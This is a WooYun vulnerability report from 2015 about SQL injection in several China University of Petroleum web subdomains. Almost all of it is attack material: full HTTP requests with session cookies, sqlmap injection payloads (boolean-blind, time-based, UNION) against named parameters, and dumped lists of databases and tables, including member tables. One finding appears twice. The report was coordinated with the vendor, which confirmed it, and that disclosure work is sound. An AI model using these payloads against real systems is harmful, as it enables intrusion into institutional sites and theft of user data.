当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155184

漏洞标题:中国石油大学多站SQL注入

相关厂商:中国石油大学

漏洞作者: 路人甲

提交时间:2015-11-23 15:28

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经确认,细节仅向厂商公开
2015-12-03: 细节向核心白帽子及相关领域专家公开
2015-12-13: 细节向普通白帽子公开
2015-12-23: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

1.

http://gis.upc.edu.cn/


POST /list.php HTTP/1.1
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://gis.upc.edu.cn
Host: gis.upc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
id=A&mapstyle=3d


id参数存在注入

sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=A' AND 2473=2473 AND 'dLxg'='dLxg&mapstyle=3d
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=A' AND (SELECT * FROM (SELECT(SLEEP(5)))ARmn) AND 'lrBi'='lrBi&mapstyle=3d
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=A' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a706271,0x67424e4756504d755a56634a66785550585a76635a7654757871737561534c63636f6f53524a7868,0x7162627071)-- -&mapstyle=3d
---
web application technology: PHP 5.4.0, Apache 2.2.22
back-end DBMS: MySQL 5.0.12


---
web application technology: PHP 5.4.0, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] gis
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


---
web application technology: PHP 5.4.0, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
Database: gis
+----------+---------+
| Table    | Entries |
+----------+---------+
| unit     | 232     |
| building | 46      |
+----------+---------+


2。

GET /dzjs/web1/lmcode.asp?fs=5&lm=128&ord=asc HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://jpkc.upc.edu.cn
Cookie: ASPSESSIONIDSASSCQCC=EPMBNOMBNJILHBBAPKKCDBGK; ASPSESSIONIDQATQCQDD=KKBENGLBGIHICLLEODCGIBKK; %CE%EF%C0%ED%CA%B5%D1%E9%D1%A7%CF%B0%CD%F8%D5%BE=Skin=; ASPSESSIONIDSATQCQDD=MKBENGLBBGKFHBCEBINKCMGO; reglevel=; fullname=; purview=; UserName=; KEY=; content=; CNZZDATA2983488=cnzz_eid%3D1346510288-1447852925-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447852925; sdmenu_my_menu=001; cod=2.7; csd=10
Host: jpkc.upc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: lm (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fs=5&lm=128 AND 3383=3383&ord=asc
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5
current user:	None
current database:	None
current user is DBA:    True

漏洞证明:

3.

中国石油大学讲座网  http://lecture.upc.edu.cn


POST /index.php?s=/Home/Article/search.html HTTP/1.1
Content-Length: 178
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://lecture.upc.edu.cn
Cookie: PHPSESSID=41a8a364rrvs24nhhesk0n48t2; onethink_home_history=think%3A%7B%22t1447850802%22%3A%22%257B%2522name%2522%253A%2522%255Cu5927%255Cu5b66%255Cu751f%255Cu5fc3%255Cu7406%255Cu53d1%255Cu5c55%2522%252C%2522id%2522%253A%252222%2522%252C%2522cover_id%2522%253A%252211%2522%257D%22%7D; Hm_lvt_d8805ffa4435c9dd63a0aafa73e79573=1447851185,1447851185,1447851185; Hm_lpvt_d8805ffa4435c9dd63a0aafa73e79573=1447851185; HMACCOUNT=BCF7C5391584366D; bdshare_firstime=1447851245627
Host: lecture.upc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
order=1&q=1&time=all&type=all


order参数存在注入

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: order=1 RLIKE (SELECT (CASE WHEN (5345=5345) THEN 1 ELSE 0x28 END))&q=1&time=all&type=all
---
back-end DBMS: MySQL 5
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


---
back-end DBMS: MySQL 5
Database: cms
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| cms_play_history      | 68317   |
| cms_search            | 5893    |
| cms_action_log        | 4213    |
| cms_ucenter_member    | 2406    |
| cms_member            | 2405    |
| cms_digg              | 553     |
| cms_document          | 553     |
| cms_picture           | 553     |
| cms_document_vod      | 538     |
| cms_auth_rule         | 239     |
| cms_menu              | 130     |
| cms_online            | 112     |
| cms_attribute         | 65      |
| cms_config            | 55      |
| cms_comment           | 30      |
| cms_favorite          | 26      |
| cms_addons            | 17      |
| cms_category          | 17      |
| cms_auth_extend       | 16      |
| cms_hooks             | 16      |
| cms_document_live     | 15      |
| cms_action            | 11      |
| cms_silde             | 11      |
| cms_channel           | 7       |
| cms_model             | 6       |
| cms_auth_group        | 3       |
| cms_auth_group_access | 3       |
| cms_pages             | 3       |
| cms_suggestions       | 3       |
| cms_links             | 2       |
| cms_server            | 2       |
+-----------------------+---------+


4.

http://gis.upc.edu.cn/


POST /list.php HTTP/1.1
Content-Length: 64
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://gis.upc.edu.cn
Host: gis.upc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
id=A&mapstyle=3d


id参数存在注入

sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=A' AND 2473=2473 AND 'dLxg'='dLxg&mapstyle=3d
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=A' AND (SELECT * FROM (SELECT(SLEEP(5)))ARmn) AND 'lrBi'='lrBi&mapstyle=3d
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=A' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a706271,0x67424e4756504d755a56634a66785550585a76635a7654757871737561534c63636f6f53524a7868,0x7162627071)-- -&mapstyle=3d
---
web application technology: PHP 5.4.0, Apache 2.2.22
back-end DBMS: MySQL 5.0.12


---
web application technology: PHP 5.4.0, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] gis
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


---
web application technology: PHP 5.4.0, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
Database: gis
+----------+---------+
| Table    | Entries |
+----------+---------+
| unit     | 232     |
| building | 46      |
+----------+---------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-23 15:33

厂商回复:

感谢您对学校的网络安全的关注,我们会尽快解决该问题。

最新状态:

暂无